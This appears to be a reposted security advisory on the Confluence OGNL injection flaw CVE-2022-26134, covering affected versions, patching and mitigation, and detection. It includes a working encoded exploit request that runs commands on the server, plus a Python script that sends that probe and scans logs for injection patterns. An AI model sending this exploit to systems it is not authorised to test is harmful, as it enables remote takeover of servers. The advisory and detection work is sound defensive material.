Atlassian Confluence Remote Code Execution Vulnerability (CVE-2022-26134) Risk Notice and PoC Reproduction

1. Background introduction

Recently, the Department of Information Security detected a remote code execution vulnerability in Atlassian Confluence Server and Data Center (CVE-2022-26134).

Confluence is enterprise knowledge management and collaboration software that can also be used to build an enterprise wiki. It is easy to use and lets teams share information, collaborate on documents, brainstorm, and push information to colleagues.

1.1 Vulnerability description

Atlassian Confluence Server and Data Center contain an OGNL injection vulnerability: the URI path of an HTTP request is evaluated as an OGNL expression. An unauthenticated attacker who can reach the server can inject a malicious OGNL expression, achieve remote code execution in the context of the Confluence process, and deploy a WebShell.
Exploitation in the wild has already been observed and exploit scripts are public; affected organisations should upgrade as soon as possible.

1.2 Vulnerability number

CVE-2022-26134

1.3 Vulnerability Level

Vulnerability Threat Level: Critical

2. Repair suggestions

2.1 Affected versions

Version range:

All Confluence Server and Data Center releases from 1.3.0 onward are affected unless they are at or above the fixed release of their branch:

Atlassian Confluence Server and Data Center < 7.4.17

Atlassian Confluence Server and Data Center < 7.13.7

Atlassian Confluence Server and Data Center < 7.14.3

Atlassian Confluence Server and Data Center < 7.15.2

Atlassian Confluence Server and Data Center < 7.16.4

Atlassian Confluence Server and Data Center < 7.17.4

Atlassian Confluence Server and Data Center < 7.18.1

2.2 Repair suggestions

1. Official fix:
Atlassian has released versions 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 and 7.18.1, which contain the fix for this vulnerability. Upgrade to the fixed release of your branch as soon as possible.
Download links:
Confluence Server Download Archives | Atlassian
Confluence Security Advisory 2022-06-02 | Confluence Data Center and Server 7.18 | Atlassian Documentation

2. Temporary mitigation:
If you cannot upgrade immediately, download the official xwork-1.0.3-atlassian-10.jar, replace the original xwork jar in the confluence/WEB-INF/lib/ directory with it, and restart Confluence. Download address:
https://packages.atlassian.com/maven-internal/opensymphony/xwork/1.0.3-atlassian-10/xwork-1.0.3-atlassian-10.jar
Note that the official advisory's workaround also replaces the webwork jar and updates classes under confluence/WEB-INF/classes for most affected branches, so follow the exact steps for your version in the advisory rather than swapping only the xwork jar. The mitigation hardens OGNL evaluation going forward; it does not remove a WebShell that was already deployed, so also check the instance for signs of prior compromise.

2.3 Reference link:

Confluence Security Advisory 2022-06-02 | Confluence Data Center and Server 7.18 | Atlassian Documentation

3. Vulnerability detection POC

Vulnerability recurrence

The method of exploiting this vulnerability is very simple. You can execute any command by directly sending the following request, and get the execution result in the HTTP return header:


GET /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/ HTTP/1.1
Host: your-ip:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close


The OGNL expression used (the decoded form of the request path above) is:

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("id").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

It runs the command with java.lang.Runtime, reads its standard output into the variable #a, and writes #a into the X-Cmd-Response header of the current response, which is why the result is visible to the client without any page content.
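As an added example (not code from the original post or from Atlassian), the following Python script builds the probe request above from its plain OGNL form, extracts the X-Cmd-Response marker from a response, and scans Tomcat-style access-log lines for the same injection pattern so defenders can hunt for attempts. The probe() helper, its default port of 8090, and the sample log lines are assumptions constructed for this example.

```python
"""Added example for CVE-2022-26134 (not the original post's code): build the
OGNL probe, read back the marker header, and detect the pattern in logs."""
import http.client
import re
from urllib.parse import quote, unquote

MARKER_HEADER = "X-Cmd-Response"


def build_ognl_expression(cmd: str, header: str = MARKER_HEADER) -> str:
    """The public PoC expression: run `cmd`, read its stdout with
    IOUtils.toString into #a, then copy #a into a response header."""
    return (
        "${(#a=@org.apache.commons.io.IOUtils@toString("
        f'@java.lang.Runtime@getRuntime().exec("{cmd}").getInputStream(),"utf-8")).'
        "(@com.opensymphony.webwork.ServletActionContext@getResponse()"
        f'.setHeader("{header}",#a))}}'
    )


def build_request_path(cmd: str) -> str:
    """The expression travels in the URI path, so every non-alphanumeric
    character is percent-encoded (safe="" leaves only A-Z a-z 0-9 _ . - ~)."""
    return "/" + quote(build_ognl_expression(cmd), safe="") + "/"


def extract_marker(headers, header: str = MARKER_HEADER):
    """Given (name, value) response headers, return the marker value if the
    server evaluated the expression, otherwise None."""
    for name, value in headers:
        if name.lower() == header.lower():
            return value
    return None


def probe(host: str, port: int = 8090, cmd: str = "id", timeout: float = 10.0):
    """Send the probe to a live target (assumed usage; network call). Only run
    this against systems you are authorised to test; `cmd` really executes."""
    conn = http.client.HTTPConnection(host, port, timeout=timeout)
    try:
        conn.request("GET", build_request_path(cmd))
        resp = conn.getresponse()
        return resp.status, extract_marker(resp.getheaders())
    finally:
        conn.close()


# Detection side: a benign Confluence URL never carries OGNL's ${...},
# @class@member or #var= syntax in the path.
_OGNL_MARKERS = re.compile(r"\$\{|@[\w.]+@|#\w+\s*=")
_LOG_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')


def is_ognl_injection(request_path: str) -> bool:
    """Decode twice so a double-encoded %2524%257B (-> %24%7B -> ${) is caught."""
    decoded = unquote(unquote(request_path))
    return bool(_OGNL_MARKERS.search(decoded))


def scan_access_log(lines):
    """Return (line_number, decoded_path) for every request that carries OGNL."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = _LOG_LINE.search(line)
        if m and is_ognl_injection(m.group("path")):
            hits.append((n, unquote(unquote(m.group("path")))))
    return hits


# Constructed sample lines in Tomcat access-log style (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Jun/2022:10:01:02 +0000] "GET /login.action HTTP/1.1" 200 5120',
    '10.0.0.9 - - [03/Jun/2022:10:01:07 +0000] "GET '
    + build_request_path("id") + ' HTTP/1.1" 302 0',
    '10.0.0.9 - - [03/Jun/2022:10:01:09 +0000] "GET /%2524%257B%2523a%257D/ HTTP/1.1" 302 0',
    '10.0.0.5 - - [03/Jun/2022:10:02:00 +0000] "GET /display/DOC/Home HTTP/1.1" 200 8800',
]

if __name__ == "__main__":
    print(build_request_path("id"))
    for lineno, path in scan_access_log(SAMPLE_LOG):
        print(f"line {lineno}: OGNL in path {path}")
```

build_request_path("id") reproduces the request line shown above byte for byte, so the script doubles as a check that the PoC was transcribed correctly. The log scanner decodes the path twice so a double-encoded ${ is still caught; if your access logs store paths already decoded, the extra unquote is harmless.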


Origin blog.csdn.net/qq_18209847/article/details/125162413